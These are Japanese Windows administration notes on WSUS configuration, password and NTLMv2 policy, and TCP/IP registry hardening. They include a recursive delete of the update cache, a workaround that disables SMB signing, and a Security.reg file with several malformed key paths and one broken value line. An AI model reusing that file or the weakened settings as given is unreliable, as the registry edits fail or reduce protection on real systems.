●サーバを指定する   「イントラネットのMicrosoft 更新サービスの場所を指定する」を選択   更新を検出するためのイントラネットの更新サービスを指定する、イントラネット統計サーバーの設定に   SUSサーバのアドレスを入力する。※設定をすると、コントロールパネルの「自動更新」は利用できなくなります。  ●強制的にポリシーを適用   Windows2000 secedit /refreshpolicy machine_policy   Windows2000 secedit /refreshpolicy user_policy   WindowsXP gpupdate /force  ●Windows Updateを無効にする   1. 名前を指定して実行で、「gpedit.msc」を起動   2. 「ユーザの構成」→「管理用テンプレート」→「Windowsコンポーネント」→「Windows Update」から    「Windows Update のすべての機能へのアクセスを削除する」を有効にする 設定すると、以下のレジストリが追加されます。   HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate WUServer : http://SUSServer SUSサーバのURLを指定します。   WUStatusServer : http://SUSServer   ステータスサーバのURLを指定します。   HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU     値の名前 : NoAutoUpdate     データ型 : REG_DWORD     値    : 0(自動更新を行ないます)         1(自動更新を行ないません)     値の名前 : UseWUServer   データ型 : REG_DWORD     値    : 0 = WUServerで指定されたSUSサーバを使いません          1 = WUServerで指定されたSUSサーバを使います     値の名前 : AUOption   データ型 : REG_DWORD     値    : 2 = 更新をダウンロードする前、およびインストールする前に通知する          3 = 更新を自動的にダウンロードし、インストールの準備ができたら通知します          4 = 更新を自動的にダウンロードし、ScheduledInstallDayとScheduledInstallTime        で指定されたスケジュールでインストールします     値の名前 : ScheduledInstallDay   データ型 : REG_DWORD     値    : 0(毎日) 1〜7 = 日曜日(1) から土曜日 (7) の曜日          AUOption = 4の時に、自動インストールが行なわれる曜日を指定します。     値の名前 : ScheduledInstallTime   データ型 : REG_DWORD     値    : 0〜23 = 24時間形式の時刻。            AUOption = 4 の時に、自動インストールが行なわれる 時刻を指定します。   ※以下、Windows2000 SP4インストール時に追加されます。   Software Update Services 1.0 ADM File for Service Pack 1 日本語版   このポリシーを追加する事でも設定可能になります。     値の名前 : RescheduleWaitTime   データ型 : REG_DWORD     値    : 1 〜 = 自動更新の再スケジュール時間。分単位。     値の名前 : NoAutoRebootWithLoggedOnUsers   データ型 : REG_DWORD     値    : 0 = 無効。自動更新が終了し5分以内に再起動することを通知。時間経過後再起動をを実施。          1 = 有効。自動更新がコンピュータを自動的に再起動せずユーザーに再起動が必要であることを通知。  ●SUSクライアントのログの意味   /wutrack.bin?    U=ping_ID C=client A=activity I=item D=device P=platform L=language S=status E=error M=message X=proxy   ping_ID   各クライアントマシンに一意に割り当てられる固有の識別子を示す。   client    値           AU: ダウンロードやインストール           IU: 初期化 IU_[サイト名]: ユーザがWindows Update サイトに接続する場合   activity    動作に関する情報を示す。            n: 初期化            s: セルフアップデート            d: 検出            w: ダウンロード。成功および失敗、また該当する場合は取り消しと拒否が記録される。            i: インストール。再起動のない失敗と成功、および再起動を伴う成功、および該当する場合は拒否が記録される。   item     activity で指定された処理が行なわれるコンポーネント(あれば)を示す。   device    処理対象のデバイス ID(あれば)を示す。   platform   クライアントマシンのシステムに関する情報を示す。        このフィールドには、「.」区切りで OS 関連の情報が記録される。        [maj_os_ver].[min_os_ver].[build_num].[plat_id].[suite_mask].[prod_type].[processor_arch]   plat_id    システムの系列を示す。            1: Windows 9x系OS(Windows 95/98/Me)            2: Windows NT系OS(Windows NT/2000/XP) suite_mask インストールされている製品に関する情報を示す。        このフィールドはビットマスクになっている。          よく使われるであろうビット            2: Windows 2000 Advanced Server か Windows .NET Enterprise Server がインストールされている           4: Microsoft BackOffice コンポーネントがインストールされている            10: Terminal Services がインストールされている           100: Terminal Services の単一ユーザバージョンがインストールされている           200: Windows XP Home Edition がインストールされている   prod_type システムに関する情報を示す。            1: ワークステーション (Windows NT 4.0 Workstation/Windows 2000 Professional/Windows XP Home Edition/Windows XP Professional)            2: ドメイン コントローラ            3: サーバー(ドメインコントローラ以外のサーバOS)   processor_arch           プロセッサアーキテクチャを示す。(32ビットマシンの場合、この値は0)           language ja-JP(日本語/日本)といったISO形式でクライアントOSの言語/地域を示す。   status 処理のステータスを示します。          値 s: 成功: 処理は、完全かつ無事に実行されました。            r: 成功 (再起動が必要): ここまでの処理の実行は成功しました。再起動して続行する必要があります。            f: 失敗: ユーザによる取り消し以外の理由で、処理の実行が失敗しました。            c: 取り消し: ユーザによって、実行中に処理が取り消されました。            d: 拒否: ユーザによって、処理が拒否されました。            n: 項目なし: 処理を実行できる更新項目がありません。            p: 保留: (おそらく)想定されていない状態です(注 12)。   error    処理の結果を8桁の16信数で示します(注 13)。使用されない場合、値は0になります。   message    発生したエラーの説明が含まれます。 proxy    状態メッセージのタイムスタンプを格納します。タイムスタンプの形式は、YYMMDDHHMMSSmmmです。 SUS 1.0 を実行しているサーバーを、2005 年 12 月 12 日 (米国時間) より後に SP1 と同期すると、以前に許可された更新プログラムが許可されなくなる場合がある http://support.microsoft.com/kb/912307/ja
 ●WSUS の準備   必要コンポーネント   Windows 2000 Server の場合    ・IIS5.0    ・IE6.0 SP1    ・.NET Framework1.1 SP1    ・BITS2.0    ・MSDE2000 Rel.a(SQL Server 2000 SP3 相当のデータベース)データベースサイズは最大2GB     ※ MSDE セットアップ時には パスワードを設定しないとインストール中に失敗します。「C:\MSDERelA\Setup.exe SAPWD="sa password"」など。   Windows Server 2003 の場合    ・IIS6.0    ・.NET Framework1.1 SP1    ・BITS2.0    ・WMSDE(WSUSのインストールパッケージに同根)データベースサイズの上限なし     ※SQLServer 2005 Express Edition が上限4GBなので制限あるかも。Workgroup Edition は上限なし SharePoint の対応 ・Web サイトへの匿名アクセスを許可   ・SharePoint の管理コンソールで既定 Web サイトに以下のパスを追加     /iuident.cab     /wutrack.bin     /clientwebservice     /Selfupdate   URLScan がインストールされている場合の設定   Urlscan.ini ファイルを編集し。    DenyExtensions から .exe のエントリを削除    AllowVerbs に以下 4つの設定が登録されていることを確認     GET     HEAD     POST     OPTIONS Windows Server Update Services Release Candidate Open Evaluation Windows Server Update Services がリリースされました マイクロソフト、Windows Server Update Services (WSUS)を、6月7日(火)より無償提供開始 Software Update Services および Windows Server Update Services におけるコンテンツの変更について Windows Server Update Services (@IT)  Windows Update v6  http://update.microsoft.com/  Microsoft Upate  http://update.microsoft.com/microsoftupdate/  ちなにみ WSUS は ↑ を見に行くようです。  905682 - Microsoft Software Update Services 1.0 のサポート ライフサイクル  http://support.microsoft.com/kb/905682/  [運用]Windows Server Update Services  http://www.atmarkit.co.jp/fwin2k/operation/wsus01/wsus01_01.html  WSUSでパッチ管理はどう変わるのか?(後編)  http://www.atmarkit.co.jp/fwin2k/operation/wsus02/wsus02_01.html  WSUSサーバでクライアントが表示されない場合の対処法  http://www.atmarkit.co.jp/fwin2k/win2ktips/707wsussid/wsussid.html Microsoft Windows Server Update Services 3.0 http://www.microsoft.com/japan/technet/windowsserver/wsus/30/default.mspx 試す前に WSUS 3.0 になってしまった。。。  特徴  ・64bit版ネイティブサポート  ・WSUS2.0 を引き継いでアップグレード可能 WSUS の Windows クライアントを再登録する方法。 http://support.microsoft.com/kb/555974 WSUS 2.0 をインストール後にコンピュータ名を変更した場合のアップグレード http://blogs.technet.com/jpwsus/archive/2009/05/01/wsus-2-0.aspx WSUS 2.0 SP1 からのアップグレードについて http://blogs.technet.com/jpwsus/archive/2008/06/03/wsus-3.0-upgrade-tips.aspx マイクロソフト セキュリティ アドバイザリ (954960) Microsoft Windows Server Update Services (WSUS) によるセキュリティ更新プログラムの展開がブロックされる http://www.microsoft.com/japan/technet/security/advisory/954960.mspx Windows XP SP3 をインストールした後、Windows Update、Microsoft Update、または自動更新で更新プログラムが正常にインストールされない http://support.microsoft.com/kb/953541 Windows Server Update Services 3.0 と Windows Server Update Services 2.0 が混在するレプリカ構成で新規のインストール承認を追加した場合、”期日なし” でインストール承認された更新プログラムに対し、第 2 階層目の WSUS 2.0 サーバーで期日が設定される http://support.microsoft.com/kb/968514 WSUS 3.0 SP1 へのアップグレード http://blogs.technet.com/jpwsus/archive/2009/04/22/wsus-3-0-sp1.aspx 別の筐体の SQL Server を使用している環境を WSUS 3.0 SP1 にアップグレードする http://blogs.technet.com/jpwsus/archive/2009/04/22/sql-server-wsus-3-0-sp1.aspx WSUS が親子構成されている環境を WSUS 3.0 SP1 にアップグレードする http://blogs.technet.com/jpwsus/archive/2009/04/22/wsus-wsus-3-0-sp1.aspx 更新プログラム用のベスト プラクティス アナライザーによって x 64 エディションの Windows Server 2008 R2 Windows Server Update Services ロールには http://support.microsoft.com/kb/981390 [システム管理編]●第2回 野放しのパッチ管理から群管理のパッチ管理へ http://itpro.nikkeibp.co.jp/article/COLUMN/20081110/318940/ そこが知りたい Windows Server Update Services(第15回) Q1 新しいWSUS 3.0 SP2は何が変わったのか? http://www.atmarkit.co.jp/fwin2k/operation/wsusqa15/wsusqa15_01.html Q1 既存のWSUSサーバをWSUS 3.0 SP2にアップグレードするには? http://www.atmarkit.co.jp/fwin2k/operation/wsusqa16/wsusqa16_01.html ●WSUS 3.0 SP2 の Windows 8 / Windows Server 2012 対応について (KB2734608) - Japan WSUS Support Team Blog - Site Home -TechNet Blogs  http://blogs.technet.com/b/jpwsus/archive/2012/09/05/kb2734608.aspx  An update for Windows Server Update Services 3.0 Service Pack 2 is available (KB2734608)  http://support.microsoft.com/kb/2734608/en-us  を適用前に、Windows8 や Windows Server 2012 を WSUS クライアントにしてしまった場合   Net stop wuauserv   rd /s %windir%\softwaredistribution\   Net start wuauserv  を実行する必要がある。 WSUS DB インデックスの再構成の手順について http://blogs.technet.com/b/jpwsus/archive/2013/02/01/wsusdb.aspx [WSUS 4.0] WSUS が Microsoft Update に接続ができない問題について修正プログラム (KB2838998) をリリースしました - Japan WSUS Support Team Blog - Site Home - TechNet Blogs http://blogs.technet.com/b/jpwsus/archive/2013/05/15/wsus-4-0-wsus-microsoft-update-kb2838998.aspx
パスワード ポリシーの既定の設定と最低限の推奨設定
ポリシー 既定の設定 最低限の推奨設定
パスワード履歴を記録する 過去 1 回のパスワード変更を記録 過去 24 回のパスワードを記録
パスワード有効期間 42 日 42 日
パスワードの変更禁止期間 0 日 2 日
パスワードの長さ 0 文字 8 文字
パスワードは要求する複雑さを満たす 無効 有効
暗号化を元に戻せる状態でドメインのすべてのユーザーのパスワードを保存する 無効 無効


Account ポリシーの既定の設定と推奨設定
ポリシー 既定の設定 最低限の推奨設定
ロック アウト期間 未定義 30 分
アカウントのロックアウトのしきい値 0 5 回ログ オンに失敗
ロックアウト カウントのリセット 未定義 30 分


メンバ サーバー ベースライン セキュリティ オプション ポリシーの設定
オプション 設定
匿名接続の追加を制限する 明示的な匿名アクセス権がない場合アクセスを許可しない
サーバー オペレータがタスクのスケジュールを割り当てるのを許可する (ドメイン コントローラのみ) 無効
システムをシャットダウンするのにログオンを必要としない 無効
リムーバブル NTFS メディアを取り出すのを許可する Administrators
セッションを切断する前に、ある一定のアイドル時間を必要とする 15 分
グローバル システム オブジェクトへのアクセスを監査する 無効
バックアップと復元の特権の使用を監査する 無効
ログオン時間を経過した場合は自動的にユーザーをログオフする 有効
ログオン時間が時間切れになった場合、自動的にユーザーをログオフする (ローカル) 有効
システムのシャットダウン時に仮想メモリのページ ファイルをクリアする 有効
常にクライアント側の通信にデジタル署名を行う 有効
可能な場合、クライアントの通信にデジタル署名を行う 有効
常にサーバーの通信にデジタル署名を行う 有効
可能な場合、サーバーの通信にデジタル署名を行う 有効
ログオンに Ctrl+Alt+Del を必要としない 無効
ログオン画面に最後のユーザー名を表示しない 有効
LAN Manager 認証レベル NTLMv2 応答のみ送信し、LM と NTLM を拒否する
ログオン時のユーザーへのメッセージのテキスト  
ログオン時のユーザーへのメッセージのタイトル  
ドメイン コントローラが利用できない場合に使用する、前回ログオンのキャッシュ数 0 回
コンピュータ アカウント パスワードのシステム保守をしない 無効
ユーザーがプリンタ ドライバをインストールできないようにする 有効
パスワードが無効になる前にユーザーに変更を促す 14 日
回復コンソール: 自動管理ログオンを許可する 無効
回復コンソール: すべてのドライブとフォルダにフロッピーのコピーとアクセスを許可する 無効
Administrator アカウント名の変更 未定義
Guest アカウント名の変更 未定義
CD-ROM へのアクセスを、ローカル ログオン ユーザーだけに制限する 有効
フロッピーへのアクセスを、ローカル ログオン ユーザーだけに制限する 有効
セキュリティで保護されたチャネル: 常にセキュリティ チャネルのデータをデジタル的に暗号化または署名する 有効
セキュリティで保護されたチャネル: 可能な場合、セキュリティ チャネルのデータをデジタル的に暗号化または署名する 有効
セキュリティで保護されたチャネル: 可能な場合、セキュリティ チャネルのデータをデジタル的に署名する 有効
セキュリティで保護されたチャネル: 強力な (Windows 2000 かそれ以降のバージョン) セッション キーを必要とする 有効
システム パーティションの保護 (RISC プラットフォームのみ) 未定義
サード パーティ製の SMB サーバーへ接続するためのパスワードを、暗号化しないで送信する 無効
セキュリティ監査のログを記録できない場合は直ちにシステムをシャットダウンする 有効 ※事前にセキュリティ ログのサイズを増やしておく
スマート カード取り出し時の動作 ワークステーションをロックする
グローバル システム オブジェクトの既定のアクセス許可を強化する (例: シンボリック リンク) 有効
署名されていないドライバのインストール時の動作 インストールを許可しない
署名されていないドライバ以外のインストール時の動作 警告するがインストールは許可する
セキュリティ設定およびユーザー権利の割り当てを変更すると、クライアント、サービス、およびプログラムとの互換性がなくなる 第 5 章 - セキュリティの構成
Windows 95/98 クライアントで NTLMv2 認証を有効にするには 1. Microsoft Internet Explorer 4.x または 5 をインストールし、128 ビットのセキュリティで保護された接続のサポートに更新する (NT4.0でNTLM2 認証を有効にするには Service Pack 4以降 が必要となります)   インストールされているバージョンを確認するには     エクスプローラを使用して、%SystemRoot%\System フォルダから Secur32.dll ファイルを検索     このファイルを右クリックし、[プロパティ] をクリック     [バージョン情報] タブをクリック     56 ビット バージョンでは、       "Microsoft Win32 Security Services (Export Version)" という説明が     128 ビット バージョンの説明は、       "Microsoft Win32 Security Services (US and Canada Only)" となります。 2. ディレクトリ サービス クライアント(DSCLIENT.EXE)をインストール   ディレクトリ サービス クライアントは、Windows 2000 CD-ROM に Clients\Win9x\Dsclient.exe として収録されています。   Windows 95/98 コンピュータで Dsclient.exe を実行すると、NTLM 2 サポートを提供するシステム ファイルも自動的にインストールされます。   インストールされるファイルは、Secur32.dll、Msnp32.dll、Vredir.vxd、および Vnetsup.vxd です。   NTLM 2 システム ファイルは、強化されたセキュリティ機能およびセキュリティ関連のフィックスの両方を提供するため、   Dsclient をアンインストールしても削除されません。 3. 下記を参考にレジストリを設定。 クライアントで NTLMv2 をアクティブ化するには ※レジストリ エディタの使い方を誤ると、深刻な問題が発生することがあります。 最悪の場合、オペレーティング システムの再インストールが必要です。 レジストリ エディタは、自己の責任においてご使用ください。  レジストリ エディタ (Regedit.exe) を起動します。  次のレジストリ キーを見つけてクリックします。     HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control     上記のレジストリ キーに、LSA というレジストリ キーを作成します。     [編集] メニューの [値の追加] をクリックし、次のレジストリの値を追加します。     値の名前 : LMCompatibility NTは、LMCompatibilityLevel     データ型 : REG_DWORD     値 : 5           0 - LM および NTLM 応答を送信する。 (XP までのデフォルト)           1 - ネゴシエートされた場合に NTLM 2 セッション セキュリティを使用する。           2 - NTLM 応答のみを送信する。           3 - NTLM 2 応答のみを送信する。 (2003, VISTA のデフォルト)           4 - ドメイン コントローラは LM 応答を拒否する。           5 - ドメイン コントローラは、LM および NTLM 応答を拒否する (NTLM 2 のみを受け入れる)。 以下のレジストリ キーを変更することにより、SSP (NTLM Security Support Provider) を利用するプログラムで使われる、 最小のセキュリティを構成できます。これらの値は、LMCompatibilityLevel 値に依存します。   レジストリ エディタ (Regedit.exe) を起動します。   次のレジストリ キーに移動します。         HKEY_LOCAL_MACHINE\System\CurrentControlSet\control\LSA\MSV1_0         値の名前 : NtlmMinClientSec         データ型 : REG_WORD         値 : 以下の値のいずれか            0x00000010 - メッセージの整合性            0x00000020 - メッセージの機密性            0x00080000 - NTLM 2 セッション セキュリティ            0x20000000 - 128 ビットの暗号化            0x80000000 - 56 ビットの暗号化 NTLM 2 認証を有効にする方法 Windows 95 または Windows NT 4.0 クライアントで Windows Server 2003 ドメインにログオンするとエラー メッセージが表示される Windows NT 上の LM 認証を無効にする方法 マイクロソフトの Securing Windows 2000 Server ソリューション 第 7 章 ‐ 特定サーバーの役割のハードニング http://www.microsoft.com/japan/technet/security/prodtech/windows2000/secwin2k/07ssrole.mspx IIS Server 6 で、NTLM 認証を強制的に行うにはどのようにしたらよいですか? http://www.microsoft.com/japan/technet/community/columns/insider/iisi0804.mspx
マックからのファイル共有について。 バージョン 5.0.11 以降で NTLMv2 認証をサポートしているようです。 http://www.microsoft.com/mac/otherproducts/otherproducts.aspx?pid=windows2000sfm NTLMv2 認証では、認証情報の暗号化機能やパスワードの使用可能文字数などの点で Mac OS 標準 UAM より優れていますので、こちらを利用しましょう。 ※ Windows 2000 Server の Microsoft UAM Volume にある Microsoft UAM は   NTLMv2 認証をサポートしてませんので、上記 URL から NTLMv2 対応バージョンをダウンロード   また、Microsoft UAM の NTLMv2 認証機能は、バージョン 3.8 以降の「AppleShare Client」が必要になります。
認証に対する保護の強化  マイクロソフト セキュリティ アドバイザリ(973811)  http://www.microsoft.com/japan/technet/security/advisory/973811.mspx  NTLMv2 と合わせて設定するのが良いかな。         HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\LSA         値の名前 : SuppressExtendedProtection         データ型 : REG_WORD         値 : 0         デフォルトは1で保護無効。         LmCompatibilityLevel のキーを 3 以上にする必要あり         Telnet でも利用可能         HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\TelnetServer\1.0         値の名前 : ExtendedProtection         データ型 : REG_WORD         値 : 0         認証に対する保護の強化を無効にする:0(デフォルト)         拡張された保護を許可する:1         拡張された保護を必須:2
LM ハッシュの作成を無効化する     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\     値の名前 : NoLMHash     データ型 : REG_DWORD     値 : 1  Windows でパスワードの LAN Manger ハッシュが Active Directory とローカル SAM データベースに保存されないよう にする方法  http://support.microsoft.com/kb/299656/ja  LanManHash 用 RainbowTable の作成  http://www.insi.co.jp/news/20060529-news.html  Windows認証を数秒で解析脆弱なパスワードは即座に破られる  http://itpro.nikkeibp.co.jp/members/NBY/ITARTICLE/20040601/1/
Windows 95/98 から Windows Server 2003 の共有フォルダにアクセス出来ない場合の対策  ・上記のディレクトリ サービス クライアント(DSCLIENT.EXE)をインストールする  ・Windows Server 2003 のポリシー設定で「SMB署名を無効にする」   のどちらかの設定をします。   SMB署名を無効にするには   [コンピュータの構成] [Windows の設定] [セキュリティの設定] [ローカル ポリシー] [セキュリティ オプション] [Microsoft ネットワーク サーバー: 常に通信にデジタル署名を行う] から変更出来ます。   Windows 2000 ドメイン コントローラを Windows Server 2003 にアップグレードする方法
セキュリティアップの為のレジストリ操作 以下を「Security.reg」と言う名で保存し、実行すれば反映されます。 Windows Registry Editor Version 5.00 'ネットワーク攻撃に対するセキュリティ対策 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSetServices\Tcpip\Parameters] 'Synattack保護 "SynAttackProtect"=dword:0x00000002 '断片化が起こることを防止 "EnablePMTUDiscovery"=dword:0x00000000 '停止しているゲートウェイを検出させない "EnableDeadGWDetect"=dword:0x00000000 'TCPがKeep Aliveパケットを送信してアイドル状態の接続がそのままであることを確認する頻度 "KeepAliveTime"=dword:0x000493e0 'ICMP着信転送メッセージに応答してルートテーブルを変更させない "EnableICMPRedirect"=dword:0x00000000 'IPセキュリティフィルタを有効 "EnableSecurityFilters"=dword:0x00000001 ' 着信パケットのうち、ソースルーティングされたパケットをすべて破棄 "DisableIPSourceRouting"=dword:0x00000002 'SYN-ACKを転送するときに、応答があるまで再転送を繰り返す回数 "TcpMaxConnectResponseRetransmissions"=dword:0x00000002 'データセグメントの再転送回数 "TcpMaxDataRetransmissions"=dword:0x00000003 'SYN-ATTACK保護の適用を開始するタイミングを制御 "TCPMaxPortsExhausted"=dword:0x00000005 'RFC1256に基づくルーター検出を実行させない [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces] "PerformRouterDiscovery"=dword:0x00000000 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSetServices\AFD\Parameters] '新しい接続を追加する必要があるときに作成する空き接続の数 "DynamicBacklogGrowthDelta"=dword:0x0000000a "EnableDynamicBacklog"=dword:0x00000001 "MinimumDynamicBacklog"=dword:0x00000014 "MaximumDynamicBacklog"=dword:0x00004e20 'NetBIOS名を解放 [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netbt\Parameters] "NoNameReleaseOnDemand"=dword:0x00000001 '短いファイル名 (8.3 形式) の自動生成を無効化する [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSetControl\FileSystem] "NtfsDisable8dot3NameCreation"=dword:0x00000001 'LM ハッシュの作成を無効化する [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSetControl\Lsa] "NoLMHash"=dword:0x00000001 'NTLMSSP セキュリティを構成する [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSetControl\Lsa\MSV1_0] "NtlmMinServerSec"=dword:0x20000000 '自動実行を無効化する [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer] "NoDriveTypeAutoRun"=dword=0x000000FF 詳しくは Windows 2000 Server セキュリティ運用ガイドの第4章を確認して下さい。 第 5 章 - セキュリティの構成 セキュリティ ベストプラクティス 管理権限におけるデータ セキュリティとデータ可用性 ネットワーク攻撃に対して最大限の保護を提供するレジストリを設定する 攻撃に対するTCP/IPの応答のチューニングについいて  この設定は、システムを攻撃から完全に保護することを目的とするものではなく、あくまで攻撃に対するTCP/IPスタックの応答のチューニングを  主眼としてる。これらのキーをチューニングしても、システムへの攻撃に利用される可能性のあるそのほかのコンポーネントは制御できない。   ネットワークのサービス拒否攻撃に対して、NT または Windows 2000のネットワーク スタックを強化するには、次のようにレジストリを設定する。     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters     値の名前 : SynAttackProtect     データ型 : REG_DWORD     値 : 2           [0] (Synattack 保護なし)           1 (TcpMaxHalfOpen および TcpMaxHalfOpenRetried の設定に達した場合に、             再転送の試行回数を減らし、RCE (ルート キャッシュ エントリ) の作成を遅延する)           2 (1 に加えて、Winsock への指示を遅延する)     説明 : Synattack保護では、SYN-ACKSの再送信回数を減らすことで、リソースを割り当てたまま維持する時間を短縮する。         RCEリソースの割り当ては、接続が確立されるまで遅延されます。         SynAttackProtect = 2 の場合、AFD への接続指示は、3方向ハンドシェイクが完了するまで遅延される。         また、保護メカニズムが動作するのは、TcpMaxHalfOpen および TcpMaxHalfOpenRetried の設定値を超えた場合だけ。     メモ : システムが攻撃を検出した場合は、スケーラブルなウィンドウ(RFC1323)とアダプタごとに構成される         TCPパラメータ(初期RTT、ウィンドウサイズ)がすべてのソケットで無効になります。         これは、保護機能が働くと、SYN-ACKが送信されるまでRCEが照会されず、接続のこの段階では         Winsockオプションを使用できないため。                  第2回 ステートフル・パケットインスペクション         http://www.atmarkit.co.jp/flinux/rensai/iptables202/iptables202a.html         TCP/IP 経由の 3 ウェイ ハンドシェイクの説明         http://support.microsoft.com/kb/172983         使用されていないポート情報: Winsock TCP 接続のパフォーマンス         http://support.microsoft.com/kb/175523     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters     値の名前 : TcpMaxHalfOpen     データ型 : REG_DWORD     値 : 100 (Professional、Server)、500 (Advanced Server)           有効範囲:100〜xFFFF     説明 : このパラメータは、SYN-RCVD状態の接続の数がいくつになった時点でSYN-ATTACK保護を開始するかを制御します。         SynAttackProtectが 1 に設定されている場合は、保護するポートのAFD受信バックログよりこの値を小さくする必要がある。         (バックログのパラメータを参照)。詳細については、「SynAttackProtect」を参照。     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters     値の名前 : TcpMaxHalfOpenRetried     データ型 : REG_DWORD     値 : 80 (Professional、Server)、400 (Advanced Server)           有効範囲 : 80〜xFFFF     説明 : このパラメータは、SYNが少なくとも1回再転送されているSYN-RCVD状態の接続の数がいくつになった時点で         SYN-ATTACK保護を開始するかを制御します。詳細については、「SynAttackProtect」を参照。          SQL Server の方にもちらっと記述がありました。           Windows Server 2003 SP1 で実行する場合、 4.1.2 接続が強制的に切断できます。           http://support.microsoft.com/kb/910228/ja     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters     値の名前 : EnablePMTUDiscovery     データ型 : REG_DWORD     値 : 0           有効範囲 : 0、[1] (False、True)     説明 : このパラメータが1(True)に設定されている場合、TCPは、リモートホストへのパスの         MTU(最大転送ユニットまたは最大パケットサイズ)の検出を試みます。         パスのMTUを検出し、TCPセグメントをそのサイズに制限することにより、         異なるMTUのネットワークに接続するパスに沿って存在する各ルーターで断片化が起こることを防止します。         断片化は、TCPスループットに悪影響を及ぼし、ネットワークの混雑を招きます。         このパラメータを0に設定すると、ローカル サブネット上にないホストへのすべての接続に576バイトのMTUが使用される。     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters     値の名前 : EnableDeadGWDetect     データ型 : REG_DWORD ブール値     値 : 0           有効範囲 : 0、[1] (False、True)     説明 : このパラメータが1の場合、TCPは、停止しているゲートウェイの検出を実行できます。         この機能を有効にすると、複数の接続で問題が発生している場合に、TCPはIPにバックアップ ゲートウェイへの変更を要求します。         バックアップ ゲートウェイは、[コントロールパネル]⇒[ネットワーク]⇒[TCP/IP 設定]で、ダイアログボックスの[詳細]タブで定義できる。     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters     値の名前 : KeepAliveTime     データ型 : REG_DWORD     値 : 300000           有効範囲 : 1〜xFFFFFFFF [7,200,000 (2 時間)]     説明 : このパラメータは、TCPがKeep Aliveパケットを送信してアイドル状態の接続がそのままであることを確認する頻度を制御します。         リモート システムが到達可能で、機能している場合は、Keep Alive 転送を認識します。既定では、Keep Alive パケットは送信されない。         この機能は、アプリケーションから接続に対して有効にされることがある。     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters     値の名前 : EnableICMPRedirects     データ型 : REG_DWORD     値 : 0           有効範囲 : 0、[1] (False、True)     説明 : このパラメータは、ルーターなどのネットワークデバイスから送信されたICMP着信転送メッセージに応答して         Windows2000がルートテーブルを変更するかどうかを制御する。     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces     値の名前 : PerformRouterDiscovery     データ型 : REG_DWORD     値 : 0           0 (無効)            1 (有効)          [2] (DHCP がルーター検出オプションを送信した場合にだけ有効) (DHCP に制御されるが、既定ではオフ)     説明 : このパラメータは、Windows2000でインターフェイスごとにRFC1256に基づくルーター検出を実行するかどうかを制御します。         「SolicitationAddressBcast」も参照しておく。     HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Netbt\Parameters     値の名前 : NoNameReleaseOnDemand     データ型 : REG_DWORD     値 : 1           有効範囲 : [0]、1 (False、True)     説明 : このパラメータは、コンピュータがネットワークから名前解放要求を受信した場合に、NetBIOS名を解放するかどうかを決定します。         このパラメータが追加されたことで、悪意のある名前解放攻撃からマシンを保護できるようになった。 各種サービスについても知りたい場合は、 脅威とその対策 : Windows Server 2003 と Windows XP のセキュリティ設定 システム サービス Microsoft Windows Server System : ポート番号一覧 Microsoft Windows 2000 TCP/IP 実装詳細 Microsoft Windows Server 2003 TCP/IP 実装詳細 Windows Server 2003 セキュリティ ガイド Windows Server 2003 で DoS 攻撃に対して TCP/IP スタックを強化する方法 に詳しく説明がされています。 Microsoft Windows レジストリの説明 W32.Kiman.B http://www.symantec.com/region/jp/avcenter/venc/data/jp-w32.kiman.b.html にもレジストリの操作が書かれてますね。ウイルス対策にも効果があるのかな? この辺りも。 Windows 2000 および Windows Server 2003 の TCP 機能について http://support.microsoft.com/kb/224829 Windows Server 2003 で TCP/IP フィルタリングを構成する方法 http://support.microsoft.com/kb/816792 Windows Server 2003 でデフォルトでは無効になっているサービス http://support.microsoft.com/kb/812519 ブラック ホール ルーターの診断と問題解決 http://support.microsoft.com/kb/159211
コンピュータのロックをショットカットで! 1.新規作成で、ショートカットを選択 2.リンク先に以下のアドレスを入力する。   %windir%\System32\rundll32.exe user32.dll,LockWorkStation 3.ショートカットの名前が「rundll32.exe」になるので、「ロック」等に変更する。 4.出来上がったショートカットをダブルクリックすると、コンピュータをロックする事が出来ます。
